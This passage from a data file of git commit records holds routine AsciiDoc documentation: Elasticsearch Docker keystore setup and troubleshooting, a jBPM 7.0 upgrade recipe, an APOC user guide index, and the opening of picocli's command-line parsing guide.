\\\ndocker.elastic.co\/elasticsearch\/elasticsearch:{version} \\\nbin\/elasticsearch-keystore create -p\n----\n\nYou can also use a `docker run` command to add or update secure settings in the\nkeystore. You'll be prompted to enter the setting values. If the keystore is\nencrypted, you'll also be prompted to enter the keystore password.\n\n[source,sh,subs=\"attributes\"]\n----\ndocker run -it --rm \\\n-v full_path_to\/config:\/usr\/share\/elasticsearch\/config \\\ndocker.elastic.co\/elasticsearch\/elasticsearch:{version} \\\nbin\/elasticsearch-keystore \\\nadd my.secure.setting \\\nmy.other.secure.setting\n----\nendif::[]\n\nIf you've already created the keystore and don't need to update it, you can\nbind-mount the `elasticsearch.keystore` file directly. You can use the\n`KEYSTORE_PASSWORD` environment variable to provide the keystore password to the\ncontainer at startup. For example, a `docker run` command might have the\nfollowing options:\n\n[source,sh]\n----\n-v full_path_to\/config\/elasticsearch.keystore:\/usr\/share\/elasticsearch\/config\/elasticsearch.keystore\n-e KEYSTORE_PASSWORD=mypassword\n----\n\n[[_c_customized_image]]\n===== Using custom Docker images\nIn some environments, it might make more sense to prepare a custom image that contains\nyour configuration. A `Dockerfile` to achieve this might be as simple as:\n\n[source,sh,subs=\"attributes\"]\n--------------------------------------------\nFROM docker.elastic.co\/elasticsearch\/elasticsearch:{version}\nCOPY --chown=elasticsearch:elasticsearch elasticsearch.yml \/usr\/share\/elasticsearch\/config\/\n--------------------------------------------\n\nYou could then build and run the image with:\n\n[source,sh]\n--------------------------------------------\ndocker build --tag=elasticsearch-custom .\ndocker run -ti -v \/usr\/share\/elasticsearch\/data elasticsearch-custom\n--------------------------------------------\n\nSome plugins require additional security permissions.\nYou must explicitly accept them either by:\n\n* Attaching a `tty` when you run the Docker image and allowing the permissions when prompted.\n* Inspecting the security permissions and accepting them (if appropriate) by adding the `--batch` flag to the plugin install command.\n\nSee {plugins}\/_other_command_line_parameters.html[Plugin management]\nfor more information.\n\nThe {es} Docker image only includes what is required to run {es}, and does\nnot provide a package manager. It is possible to add additional utilities\nwith a multi-phase Docker build. You must also copy any dependencies, for\nexample shared libraries.\n\n[source,sh,subs=\"attributes\"]\n--------------------------------------------\nFROM centos:8 AS builder\nyum install -y some-package\n\nFROM docker.elastic.co\/elasticsearch\/elasticsearch:{version}\nCOPY --from=builder \/usr\/bin\/some-utility \/usr\/bin\/\nCOPY --from=builder \/usr\/lib\/some-lib.so \/usr\/lib\/\n--------------------------------------------\n\nYou should use `centos:8` as a base in order to avoid incompatibilities.\nUse http:\/\/man7.org\/linux\/man-pages\/man1\/ldd.1.html[`ldd`] to list the\nshared libraries required by a utility.\n\n[discrete]\n[[troubleshoot-docker-errors]]\n==== Troubleshoot Docker errors for {es}\n\nHere\u2019s how to resolve common errors when running {es} with Docker.\n\n===== elasticsearch.keystore is a directory\n\n[source,txt]\n----\nException in thread \"main\" org.elasticsearch.bootstrap.BootstrapException: java.io.IOException: Is a directory: SimpleFSIndexInput(path=\"\/usr\/share\/elasticsearch\/config\/elasticsearch.keystore\") Likely root cause: java.io.IOException: Is a directory\n----\n\nA <<docker-keystore-bind-mount,keystore-related>> `docker run` command attempted\nto directly bind-mount an `elasticsearch.keystore` file that doesn't exist. If\nyou use the `-v` or `--volume` flag to mount a file that doesn't exist, Docker\ninstead creates a directory with the same name.\n\nTo resolve this error:\n\n. Delete the `elasticsearch.keystore` directory in the `config` directory.\n. Update the `-v` or `--volume` flag to point to the `config` directory path\n rather than the keystore file's path. For an example, see\n <<docker-keystore-bind-mount>>.\n. Retry the command.\n\n===== elasticsearch.keystore: Device or resource busy\n\n[source,txt]\n----\nException in thread \"main\" java.nio.file.FileSystemException: \/usr\/share\/elasticsearch\/config\/elasticsearch.keystore.tmp -> \/usr\/share\/elasticsearch\/config\/elasticsearch.keystore: Device or resource busy\n----\n\nA `docker run` command attempted to <<docker-keystore-bind-mount,update the\nkeystore>> while directly bind-mounting the `elasticsearch.keystore` file. To\nupdate the keystore, the container requires access to other files in the\n`config` directory, such as `keystore.tmp`.\n\nTo resolve this error:\n\n. Update the `-v` or `--volume` flag to point to the `config` directory\n path rather than the keystore file's path. For an example, see\n <<docker-keystore-bind-mount>>.\n. Retry the command.","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"922a3c7b520bc3a28560674647223ae7fc9bc557","subject":"[GUVNOR-2889] kie-wb WARs renamed (#27)","message":"[GUVNOR-2889] kie-wb WARs renamed (#27)\n\n","repos":"droolsjbpm\/jbpm-website,droolsjbpm\/jbpm-website,droolsjbpm\/jbpm-website,droolsjbpm\/jbpm-website","old_file":"download\/upgradeRecipe\/upgradeRecipe7.0.adoc","new_file":"download\/upgradeRecipe\/upgradeRecipe7.0.adoc","new_contents":"= Upgrade recipe 7.0\n:awestruct-description: Upgrade to jBPM 7.0 from a previous version.\n:awestruct-layout: upgradeRecipeBase\n:awestruct-priority: 0.5\n:awestruct-upgrade_recipe_version: 7.0\n\n== Backwards incompatible changes to the public API\n\nBecause this is a new major version number (7.0), which is the foundation for the 7.x series for the next few years,\nit allows us to make backwards incompatible changes to the public API _for the long term benefit of this project_.\n\nOur current intention is to keep these backwards incompatible changes to a strict minimum\n(by favoring deprecation over removal) and do not introduce any additional ones after 7.0.\n\nAny backwards incompatible changes are annotated with a [.label.label-danger.label-as-badge.label-public-api]#Public API# badge.\n\n\n== From 6.5.0.Final to 7.0.0.Final\n\n\n[.upgrade-recipe-major.upgrade-recipe-public-api]\n=== Java 8 or higher required\n\nIf you're using JRE or JDK 6 or 7, upgrade to JDK 8 or higher.\n\nWe currently intend to support a minimal version of Java 8 throughout the entire 7.x series.\n\n=== singleResult flag removed from QueryFilter\n\norg.kie.internal.query.QueryFilter does not offer an option for retrieving a single result anymore.\n\n[.upgrade-recipe-major.upgrade-recipe-public-api]\n=== KIE Workbench WARs renamed\nThe KIE Workbench WARs were renamed from `kie-wb-distribution-wars-<version>-<container>.war`\nto just `kie-wb-<version>-<container>.war`. In case you depend directly on the Maven GAV you need to change\nthe `artifactId`:\n\nBefore in `pom.xml`:\n[source, xml]\n----\n<dependency>\n <groupId>org.kie<\/groupId>\n <artifactId>kie-wb-distribution-wars<\/artifactId>\n <version>6.5.0.Final<\/version>\n <type>war<\/type>\n <classifier>wildfly10<\/classifier>\n<\/dependency>\n----\n\nAfter in `pom.xml`:\n[source, xml]\n----\n<dependency>\n <groupId>org.kie<\/groupId>\n <artifactId>kie-wb<\/artifactId>\n <version>7.0.0.Final<\/version>\n <type>war<\/type>\n <classifier>wildfly10<\/classifier>\n<\/dependency>\n----","old_contents":"= Upgrade recipe 7.0\n:awestruct-description: Upgrade to jBPM 7.0 from a previous version.\n:awestruct-layout: upgradeRecipeBase\n:awestruct-priority: 0.5\n:awestruct-upgrade_recipe_version: 7.0\n\n== Backwards incompatible changes to the public API\n\nBecause this is a new major version number (7.0), which is the foundation for the 7.x series for the next few years,\nit allows us to make backwards incompatible changes to the public API _for the long term benefit of this project_.\n\nOur current intention is to keep these backwards incompatible changes to a strict minimum\n(by favoring deprecation over removal) and do not introduce any additional ones after 7.0.\n\nAny backwards incompatible changes are annotated with a [.label.label-danger.label-as-badge.label-public-api]#Public API# badge.\n\n\n== From 6.5.0.Final to 7.0.0.Beta2\n\n\n[.upgrade-recipe-major.upgrade-recipe-public-api]\n=== Java 8 or higher required\n\nIf you're using JRE or JDK 6 or 7, upgrade to JDK 8 or higher.\n\nWe currently intend to support a minimal version of Java 8 throughout the entire 7.x series.\n\n=== singleResult flag removed from QueryFilter\n\norg.kie.internal.query.QueryFilter does not offer an option for retrieving a single result anymore.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5eb739ff6855da6bca949046f43e78a81e055215","subject":"Moved manual installation instructions in docs","message":"Moved manual installation instructions in docs\n","repos":"larusba\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,larusba\/neo4j-apoc-procedures","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"= APOC User Guide {apoc-release}\n:toc: left\n:experimental:\n:sectid:\n:sectlinks:\n:toclevels: 3\n:img: https:\/\/raw.githubusercontent.com\/neo4j-contrib\/neo4j-apoc-procedures\/{branch}\/docs\/img\n:script: https:\/\/raw.githubusercontent.com\/neo4j-contrib\/neo4j-apoc-procedures\/{branch}\/docs\/script\n\n== Introduction\n\nNOTE: Go here for documentation for APOC for Neo4j version link:index30.html[3.0.x] link:index31.html[3.1.x] link:index32.html[3.2.x] link:index33.html[3.3.x]\n\n++++\n<iframe width=\"560\" height=\"315\" src=\"https:\/\/www.youtube.com\/embed\/V1DTBjetIfk\" frameborder=\"0\" allow=\"autoplay; encrypted-media\" allowfullscreen><\/iframe>\n++++\n\ninclude::..\/readme.adoc[tags=intro,leveloffset=1]\n\n++++\n<iframe width=\"560\" height=\"315\" src=\"https:\/\/www.youtube.com\/embed\/b1Yr2nHNS4M\" frameborder=\"0\" allow=\"autoplay; encrypted-media\" allowfullscreen><\/iframe>\n++++\n\ninclude::..\/readme.adoc[tags=signature,leveloffset=1]\n\n== Help and Usage\n\ninclude::overview.adoc[tags=help,leveloffset=-1]\n\nTo generate the help output, apoc utilizes the built in `dbms.procedures()` and `dbms.functions()` utilities.\n\n== Installation in Neo4j Server & Docker\n\ninclude::..\/readme.adoc[tags=install,leveloffset=1]\n\ninclude::..\/readme.adoc[tags=warnings,leveloffset=0]\n\ninclude::..\/readme.adoc[tags=docker,leveloffset=0]\n\n\n\/\/ include::overview.adoc[tags=overview,leveloffset=1]\n\n== Overview of APOC Procedures & Functions\n\n[[table-all]]\n[separator=\u00a6,opts=header]\n|===\ninclude::..\/build\/generated-documentation\/documentation.csv[]\n|===\n\ninclude::functions.adoc[leveloffset=+1]\n\n== Text and Lookup Indexes\n\n=== Index Queries\n\nProcedures to add to and query manual indexes\n\nNOTE: Please note that there are (case-sensitive) http:\/\/neo4j.com\/docs\/developer-manual\/current\/#cypher-schema[automatic schema indexes], for equality, non-equality, existence, range queries, starts with, ends-with and contains!\n\n[separator=\u00a6,opts=header,cols=\"1,1m,5\"]\n|===\ninclude::..\/build\/generated-documentation\/apoc.index.csv[]\n|===\n\n\/\/\/\/\n[cols=\"1m,5\"]\n|===\n| apoc.index.addAllNodes('index-name',{label1:['prop1',...],...}, {options}) | add all nodes to this full text index with the given fields, additionally populates a 'search' index field with all of them in one place\n| apoc.index.addNode(node,['prop1',...]) | add node to an index for each label it has\n| apoc.index.addNodeByLabel('Label',node,['prop1',...]) | add node to an index for the given label\n| apoc.index.addNodeByName('name',node,['prop1',...]) | add node to an index for the given name\n| apoc.index.addRelationship(rel,['prop1',...]) | add relationship to an index for its type\n| apoc.index.addRelationshipByName('name',rel,['prop1',...]) | add relationship to an index for the given name\n| apoc.index.removeNodeByName('name',node) remove node from an index for the given name\n| apoc.index.removeRelationshipByName('name',rel) remove relationship from an index for the given name\n|===\n\/\/\/\/\n\nimage::{img}\/apoc.index.nodes-with-score.jpg[width=600]\n\n\/\/\/\/\n\n[cols=\"1m,5\"]\n|===\n| apoc.index.search('index-name', 'query') YIELD node, weight | search for the first 100 nodes in the given full text index matching the given lucene query returned by relevance\n| apoc.index.nodes('Label','prop:value*') YIELD node, weight | lucene query on node index with the given label name\n| apoc.index.relationships('TYPE','prop:value*') YIELD rel, weight | lucene query on relationship index with the given type name\n| apoc.index.between(node1,'TYPE',node2,'prop:value*') YIELD rel, weight | lucene query on relationship index with the given type name bound by either or both sides (each node parameter can be null)\n| apoc.index.out(node,'TYPE','prop:value*') YIELD node, weight | lucene query on relationship index with the given type name for *outgoing* relationship of the given node, *returns end-nodes*\n| apoc.index.in(node,'TYPE','prop:value*') YIELD node, weight | lucene query on relationship index with the given type name for *incoming* relationship of the given node, *returns start-nodes*\n|===\n\/\/\/\/\n\n=== Index Management\n\n\/\/\/\/\n[cols=\"1m,5\"]\n|===\n| CALL apoc.index.list() YIELD type,name,config | lists all manual indexes\n| CALL apoc.index.remove('name') YIELD type,name,config | removes manual indexes\n| CALL apoc.index.forNodes('name',{config}) YIELD type,name,config | gets or creates manual node index\n| CALL apoc.index.forRelationships('name',{config}) YIELD type,name,config | gets or creates manual relationship index\n|===\n\/\/\/\/\n\n.Add node to index example\n[source,cypher]\n----\nmatch (p:Person) call apoc.index.addNode(p,[\"name\",\"age\"]) RETURN count(*);\n\/\/ 129s for 1M People\ncall apoc.index.nodes('Person','name:name100*') YIELD node, weight return * limit 2\n----\n\n\/\/ include::overview.adoc[tags=fulltext]\n\ninclude::manual-indexes.adoc[leveloffset=2]\n\ninclude::fulltext.adoc[leveloffset=2]\n\n== Utility Functions\n\ninclude::phonetic.adoc[leveloffset=2]\ninclude::extract.adoc[leveloffset=2]\n\ninclude::ttl.adoc[leveloffset=2]\n\ninclude::datetime.adoc[leveloffset=2]\n\ninclude::number.adoc[leveloffset=2]\n\ninclude::exact.adoc[leveloffset=2]\n\ninclude::diff.adoc[leveloffset=2]\n\n== Graph Algorithms\n\ninclude::algo.adoc[leveloffset=2]\ninclude::expand.adoc[leveloffset=2]\ninclude::centrality.adoc[leveloffset=2]\ninclude::pagerank.adoc[leveloffset=2]\n\n== Spatial\n\ninclude::spatial.adoc[leveloffset=2]\n\n== Data Integration\n\ninclude::loadjson.adoc[leveloffset=2]\ninclude::loadjdbc.adoc[leveloffset=2]\ninclude::loadcsv.adoc[leveloffset=2]\ninclude::gephi.adoc[leveloffset=2]\ninclude::elasticsearch.adoc[leveloffset=2]\ninclude::loadxml.adoc[leveloffset=2]\ninclude::loadhtml.adoc[leveloffset=2]over\n\n== Graph Refactorings\n\ninclude::refactor.adoc[leveloffset=2]\n\n== Cypher Operations\n\ninclude::cypher.adoc[leveloffset=2]\ninclude::periodic.adoc[leveloffset=2]\n\n++++\n<link rel=\"stylesheet\" type=\"text\/css\" href=\"https:\/\/cdn.datatables.net\/1.10.13\/css\/jquery.dataTables.min.css\">\n<script src=\"https:\/\/code.jquery.com\/jquery-1.12.4.js\"><\/script>\n<script src=\"https:\/\/cdn.datatables.net\/1.10.13\/js\/jquery.dataTables.min.js\"><\/script>\n<script>\n$(document).ready(function() {\n $('#table-all').DataTable();\n} );\n<\/script>\n++++\n\n== Virtual\n\ninclude::create-virtual-nodes-rels.adoc[leveloffset=1]\n\ninclude::virtual-graph.adoc[leveloffset=1]\n\ninclude::grouping.adoc[leveloffset=1]\n\n== Graph Refactoring\n\ninclude::graph-refactor.adoc[leveloffset=1]\n\n== Triggers\n\ninclude::trigger.adoc[leveloffset=2]\n\n== Schema\n\ninclude::schema.adoc[leveloffset=2]\n\n== Atomic\n\ninclude::atomic.adoc[leveloffset=1]\n\n== Bolt\n\ninclude::bolt.adoc[leveloffset=1]\n\n== Appendix: Complete Overview\n\ninclude::overview.adoc[tags=overview,leveloffset=1]\n\n== Performance Tests\n\ninclude::big-graph-from-cypher.adoc[leveloffset=1]\n\ninclude::graphml-tests.adoc[leveloffset=1]\n","old_contents":"= APOC User Guide {apoc-release}\n:toc: left\n:experimental:\n:sectid:\n:sectlinks:\n:toclevels: 3\n:img: https:\/\/raw.githubusercontent.com\/neo4j-contrib\/neo4j-apoc-procedures\/{branch}\/docs\/img\n:script: https:\/\/raw.githubusercontent.com\/neo4j-contrib\/neo4j-apoc-procedures\/{branch}\/docs\/script\n\n== Introduction\n\nNOTE: Go here for documentation for APOC for Neo4j version link:index30.html[3.0.x] link:index31.html[3.1.x] link:index32.html[3.2.x] link:index33.html[3.3.x]\n\n++++\n<iframe width=\"560\" height=\"315\" src=\"https:\/\/www.youtube.com\/embed\/V1DTBjetIfk\" frameborder=\"0\" allow=\"autoplay; encrypted-media\" allowfullscreen><\/iframe>\n++++\n\ninclude::..\/readme.adoc[tags=intro,leveloffset=1]\n\n++++\n<iframe width=\"560\" height=\"315\" src=\"https:\/\/www.youtube.com\/embed\/b1Yr2nHNS4M\" frameborder=\"0\" allow=\"autoplay; encrypted-media\" allowfullscreen><\/iframe>\n++++\n\ninclude::..\/readme.adoc[tags=signature,leveloffset=1]\n\n== Help and Usage\n\ninclude::overview.adoc[tags=help,leveloffset=-1]\n\nTo generate the help output, apoc utilizes the built in `dbms.procedures()` and `dbms.functions()` utilities.\n\n== Overview of APOC Procedures & Functions\n\n[[table-all]]\n[separator=\u00a6,opts=header]\n|===\ninclude::..\/build\/generated-documentation\/documentation.csv[]\n|===\n\ninclude::functions.adoc[leveloffset=+1]\n\ninclude::..\/readme.adoc[tags=install,leveloffset=1]\n\n=== Notices\n\ninclude::..\/readme.adoc[tags=warnings,leveloffset=1]\n\ninclude::..\/readme.adoc[tags=docker,leveloffset=1]\n\n\n\/\/ include::overview.adoc[tags=overview,leveloffset=1]\n\n== Text and Lookup Indexes\n\n=== Index Queries\n\nProcedures to add to and query manual indexes\n\nNOTE: Please note that there are (case-sensitive) http:\/\/neo4j.com\/docs\/developer-manual\/current\/#cypher-schema[automatic schema indexes], for equality, non-equality, existence, range queries, starts with, ends-with and contains!\n\n[separator=\u00a6,opts=header,cols=\"1,1m,5\"]\n|===\ninclude::..\/build\/generated-documentation\/apoc.index.csv[]\n|===\n\n\/\/\/\/\n[cols=\"1m,5\"]\n|===\n| apoc.index.addAllNodes('index-name',{label1:['prop1',...],...}, {options}) | add all nodes to this full text index with the given fields, additionally populates a 'search' index field with all of them in one place\n| apoc.index.addNode(node,['prop1',...]) | add node to an index for each label it has\n| apoc.index.addNodeByLabel('Label',node,['prop1',...]) | add node to an index for the given label\n| apoc.index.addNodeByName('name',node,['prop1',...]) | add node to an index for the given name\n| apoc.index.addRelationship(rel,['prop1',...]) | add relationship to an index for its type\n| apoc.index.addRelationshipByName('name',rel,['prop1',...]) | add relationship to an index for the given name\n| apoc.index.removeNodeByName('name',node) remove node from an index for the given name\n| apoc.index.removeRelationshipByName('name',rel) remove relationship from an index for the given name\n|===\n\/\/\/\/\n\nimage::{img}\/apoc.index.nodes-with-score.jpg[width=600]\n\n\/\/\/\/\n\n[cols=\"1m,5\"]\n|===\n| apoc.index.search('index-name', 'query') YIELD node, weight | search for the first 100 nodes in the given full text index matching the given lucene query returned by relevance\n| apoc.index.nodes('Label','prop:value*') YIELD node, weight | lucene query on node index with the given label name\n| apoc.index.relationships('TYPE','prop:value*') YIELD rel, weight | lucene query on relationship index with the given type name\n| apoc.index.between(node1,'TYPE',node2,'prop:value*') YIELD rel, weight | lucene query on relationship index with the given type name bound by either or both sides (each node parameter can be null)\n| apoc.index.out(node,'TYPE','prop:value*') YIELD node, weight | lucene query on relationship index with the given type name for *outgoing* relationship of the given node, *returns end-nodes*\n| apoc.index.in(node,'TYPE','prop:value*') YIELD node, weight | lucene query on relationship index with the given type name for *incoming* relationship of the given node, *returns start-nodes*\n|===\n\/\/\/\/\n\n=== Index Management\n\n\/\/\/\/\n[cols=\"1m,5\"]\n|===\n| CALL apoc.index.list() YIELD type,name,config | lists all manual indexes\n| CALL apoc.index.remove('name') YIELD type,name,config | removes manual indexes\n| CALL apoc.index.forNodes('name',{config}) YIELD type,name,config | gets or creates manual node index\n| CALL apoc.index.forRelationships('name',{config}) YIELD type,name,config | gets or creates manual relationship index\n|===\n\/\/\/\/\n\n.Add node to index example\n[source,cypher]\n----\nmatch (p:Person) call apoc.index.addNode(p,[\"name\",\"age\"]) RETURN count(*);\n\/\/ 129s for 1M People\ncall apoc.index.nodes('Person','name:name100*') YIELD node, weight return * limit 2\n----\n\n\/\/ include::overview.adoc[tags=fulltext]\n\ninclude::manual-indexes.adoc[leveloffset=2]\n\ninclude::fulltext.adoc[leveloffset=2]\n\n== Utility Functions\n\ninclude::phonetic.adoc[leveloffset=2]\ninclude::extract.adoc[leveloffset=2]\n\ninclude::ttl.adoc[leveloffset=2]\n\ninclude::datetime.adoc[leveloffset=2]\n\ninclude::number.adoc[leveloffset=2]\n\ninclude::exact.adoc[leveloffset=2]\n\ninclude::diff.adoc[leveloffset=2]\n\n== Graph Algorithms\n\ninclude::algo.adoc[leveloffset=2]\ninclude::expand.adoc[leveloffset=2]\ninclude::centrality.adoc[leveloffset=2]\ninclude::pagerank.adoc[leveloffset=2]\n\n== Spatial\n\ninclude::spatial.adoc[leveloffset=2]\n\n== Data Integration\n\ninclude::loadjson.adoc[leveloffset=2]\ninclude::loadjdbc.adoc[leveloffset=2]\ninclude::loadcsv.adoc[leveloffset=2]\ninclude::gephi.adoc[leveloffset=2]\ninclude::elasticsearch.adoc[leveloffset=2]\ninclude::loadxml.adoc[leveloffset=2]\ninclude::loadhtml.adoc[leveloffset=2]over\n\n== Graph Refactorings\n\ninclude::refactor.adoc[leveloffset=2]\n\n== Cypher Operations\n\ninclude::cypher.adoc[leveloffset=2]\ninclude::periodic.adoc[leveloffset=2]\n\n++++\n<link rel=\"stylesheet\" type=\"text\/css\" href=\"https:\/\/cdn.datatables.net\/1.10.13\/css\/jquery.dataTables.min.css\">\n<script src=\"https:\/\/code.jquery.com\/jquery-1.12.4.js\"><\/script>\n<script src=\"https:\/\/cdn.datatables.net\/1.10.13\/js\/jquery.dataTables.min.js\"><\/script>\n<script>\n$(document).ready(function() {\n $('#table-all').DataTable();\n} );\n<\/script>\n++++\n\n== Virtual\n\ninclude::create-virtual-nodes-rels.adoc[leveloffset=1]\n\ninclude::virtual-graph.adoc[leveloffset=1]\n\ninclude::grouping.adoc[leveloffset=1]\n\n== Graph Refactoring\n\ninclude::graph-refactor.adoc[leveloffset=1]\n\n== Triggers\n\ninclude::trigger.adoc[leveloffset=2]\n\n== Schema\n\ninclude::schema.adoc[leveloffset=2]\n\n== Atomic\n\ninclude::atomic.adoc[leveloffset=1]\n\n== Bolt\n\ninclude::bolt.adoc[leveloffset=1]\n\n== Appendix: Complete Overview\n\ninclude::overview.adoc[tags=overview,leveloffset=1]\n\n== Performance Tests\n\ninclude::big-graph-from-cypher.adoc[leveloffset=1]\n\ninclude::graphml-tests.adoc[leveloffset=1]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"52bfc4cf4a92ad8f2e9c6e04b9c3f44e3d7059dd","subject":"simplified sample code","message":"simplified sample code\n","repos":"remkop\/picocli,remkop\/picocli,remkop\/picocli,remkop\/picocli","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"= picocli - a mighty tiny Command Line Interface\nRemko Popma <rpopma@apache.org>\nv0.3.0, 2017-03-25\n:toc: left\n:numbered:\n:toclevels: 2\n:toc-title: Features\n\nA Java command line parsing framework in a single file, so you can include it _in source form_\nand let users run your application without an external dependency.\nProduces clean and easily tailored usage help messages.\n\nHow it works: annotate your class and picocli initializes it from the command line arguments,\nconverting the input to strongly typed values in the fields of your class.\n\n== Example\n\n[source,java]\n----\nimport picocli.CommandLine.Option;\nimport picocli.CommandLine.Parameters;\nimport java.io.File;\n\npublic class Example {\n @Option(names = { \"-v\", \"--verbose\" }, description = \"Be verbose.\")\n private boolean verbose = false;\n\n @Option(names = { \"-h\", \"--help\" }, help = true,\n description = \"Displays this help message and quits.\")\n private boolean helpRequested = false;\n\n @Parameters(arity = \"1..*\", paramLabel = \"FILE\", description = \"File(s) to process.\")\n private File[] inputFiles;\n ...\n}\n----\n\nThen invoke `CommandLine.parse` with the command line parameters and an object you want to initialize.\n\n[source,java]\n----\nString[] args = { \"-v\", \"inputFile1\", \"inputFile2\" };\nExample app = CommandLine.parse(new Example(), args);\nassert !app.helpRequested;\nassert app.verbose;\nassert app.inputFiles != null && app.inputFiles.length == 2;\n----\n\n== Options and Parameters\nCommand line arguments can be separated into _options_ (sometimes called _flags_ or _switches_), and _parameters_ (sometimes called _positional parameters_ or _operands_).\nOptions have a name, parameters are the values that follow the options.\n\n[source]\n----\n<command> -cvf=file1.txt --out result.txt abc def 123 45.6\n | | | | | | | |\n | | | | +---+---+---+--- positional parameters\n | | | |\n | | | +--- option-parameter for \"--out\"\n | | |\n | | +--- option\n | |\n | +--- option-parameter for \"-f\"\n |\n +--- clustered options \"-c\", \"-v\", and \"-f\"\n----\nPicocli has separate annotations for options and positional parameters because they work slightly differently.\n\n.Best Practices\n[TIP]\nThe https:\/\/www.gnu.org\/prep\/standards\/html_node\/Command_002dLine-Interfaces.html#Command_002dLine-Interfaces[GNU recommendations] for command line interfaces and http:\/\/pubs.opengroup.org\/onlinepubs\/9699919799\/basedefs\/V1_chap12.html#tag_12_02[POSIX Utility Guidelines] may be useful. Generally, many applications use options for optional values and parameters for mandatory values.\nHowever, picocli lets you make options required if you want to, see <<Required Options>>.\n\n=== Options\nAn option must have one or more `names`. Option names usually have a prefix to distinguish them from parameters. Different operating systems and applications use https:\/\/en.wikipedia.org\/wiki\/Command-line_interface#Command-line_option[different prefixing] styles. Picocli lets you use any option name you want.\n\nTIP: You may be interested in this http:\/\/catb.org\/~esr\/writings\/taoup\/html\/ch10s05.html#id2948149[list of common option names]. Following these conventions may make your application more intuitive to use.\n\nThe below example shows options with one or more names, options that take an option parameter, and \"help\" options.\n[source,java]\n----\nclass Tar {\n @Option(names = { \"-c\", \"--create\" }, description = \"create a new archive\")\n boolean create;\n\n @Option(names = \"-x\", description = \"extract files from an archive\")\n boolean extract;\n\n @Option(names = { \"-f\", \"--file\" }, paramLabel = \"ARCHIVE\",\n description = \"use archive file or device ARCHIVE\")\n File archive;\n\n @Parameters(paramLabel = \"FILE\", description = \"one ore more files to archive\")\n File[] files;\n}\n----\nPicocli matches the option names to set the field values.\n[source,java]\n----\nString[] args = { \"-cf\", \"result.tar\", \"file1.txt\", \"file2.txt\" };\nTar tar = CommandLine.parse(new Tar(), args);\nassert tar.create;\nassert !tar.extract;\nassert tar.archive.equals(new File(\"result.tar\"));\nassert Arrays.equals(tar.files, new File[] {new File(\"file1.txt\"), new File(\"file2.txt\")});\n----\n\nPicocli supports http:\/\/pubs.opengroup.org\/onlinepubs\/9699919799\/basedefs\/V1_chap12.html#tag_12_02[POSIX clustered short options]:\nOne or more options without option-arguments, followed by at most one option that takes an option-argument, should be accepted when grouped behind one '-' delimiter.\n\n\nFor example, given this annotated class:\n[source,java]\n----\nclass ClusteredShortOptions {\n @Option(names = \"-a\") boolean a;\n @Option(names = \"-b\") boolean b;\n @Option(names = \"-c\") boolean c;\n @Option(names = \"-f\") String f;\n}\n----\nThe following command line arguments are all equivalent and parsing them will give the same result:\n\n[source,java]\n----\n<command> -abcfInputFile.txt\n<command> -a -b -c -fInputFile.txt\n<command> -a -b -c -f InputFile.txt\n<command> -a -b -c -f=InputFile.txt\n<command> -abc -f=InputFile.txt\n<command> -ab -cf=InputFile.txt\n...\n----\n\n\n=== Positional Parameters\nPositional parameters (also called operands) are the command line arguments following the options.\n\nUse the (zero-based) `index` attribute to specify exactly which parameters to capture. Omitting the `index` attribute means the field is initialized with all positional parameters (so the field should be a multi-value type like an array or a collection).\n\nThe `index` attribute accepts \"range\" values, so an annotation like `@Parameters(index=\"2..4\")` captures arguments at index 2, 3 and 4. Range values can be open-ended. For example, `@Parameters(index=\"3..*\")` captures all arguments from index 3 and up.\n\nThe advantage of capturing individual parameters in separate fields is that you can enforce strong typing. For example:\n\n[source,java]\n----\nclass PositionalParameters {\n @Parameters(hidden = true) \/\/ \"hidden\": don't show this parameter in usage help message\n List<String> allParameters; \/\/ no \"index\" attribute: captures _all_ arguments (as Strings)\n\n @Parameters(index = \"0\", \/\/ index=0: the first positional parameter\n description = \"Host name or IP address to connect to\")\n InetAddress host;\n\n @Parameters(index = \"1\", \/\/ index=1: the second positional parameter\n description = \"Port number to connect to\")\n int port;\n\n @Parameters(index = \"2..*\", description = \"the files to process\")\n File[] files;\n}\n----\n\nPicocli initializes fields with the values at the specified index in the arguments array.\n[source,java]\n----\nString[] args = { \"localhost\", \"12345\", \"file1.txt\", \"file2.txt\" };\nPositionalParameters params = CommandLine.parse(new PositionalParameters(), args);\nassert params.host.getHostName().equals(\"localhost\");\nassert params.port == 12345;\nassert Arrays.equals(params.files, new File[] {new File(\"file1.txt\"), new File(\"file2.txt\")});\nassert params.allParameters.equals(Arrays.asList(\"localhost\", \"12345\", \"file1.txt\", \"file2.txt\"));\n----\n\nSee <<Type Conversion>> for which types are supported out of the box and how to add custom types.\n\n=== Double dash (`--`)\nWhen one of the command line arguments is two dashes without any characters attached (`--`), picocli interprets all following arguments as positional parameters, even arguments that match an option name.\n\n[source,java]\n----\nclass DoubleDash {\n @Parameters\n List<String> params;\n\n @Option(names = \"--files\")\n List<String> files;\n\n @Option(names = { \"-v\", \"--verbose\" })\n boolean verbose;\n}\n----\n\nThe `--` clarifies which of the arguments are positional parameters:\n[source,java]\n----\nString[] args = { \"-v\", \"--\", \"--files\", \"file1\", \"file2\" };\nDoubleDash doubleDash = CommandLine.parse(new DoubleDash(), args);\n\nassert doubleDash.verbose;\nassert doubleDash.files == null;\nassert doubleDash.params != null && doubleDash.params.length == 3;\nassert doubleDash.params.equals(Arrays.asList(\"--files\", \"file1\", \"file2\"));\n----\n\n=== Option-Parameter Separators\n==== Default Separators\nOptions may take an _option parameter_ (also called _option-argument_).\nFor POSIX-style short options (like `-f` or `-c`), the option parameter may be attached to the option,\nor it may be separated by a space or the _separator string_ (`=` by default).\nThat is, all of the below are equivalent:\n[source,java]\n----\n<command> -foutput.txt\n<command> -f output.txt\n<command> -f=output.txt\n----\n\nLong option names (like `--file`) must be separated from their option parameter by a space or the\n_separator string_ (`=` by default). That is, the first two below examples are valid but the last example is invalid:\n[source,java]\n----\n\/\/ valid\n<command> --file output.txt\n<command> --file=output.txt\n\n\/\/ invalid (picocli will not recognize the --file option)\n<command> --fileoutput.txt\n----\n\n==== Custom Separators\nThe separator string can be customized programmatically or 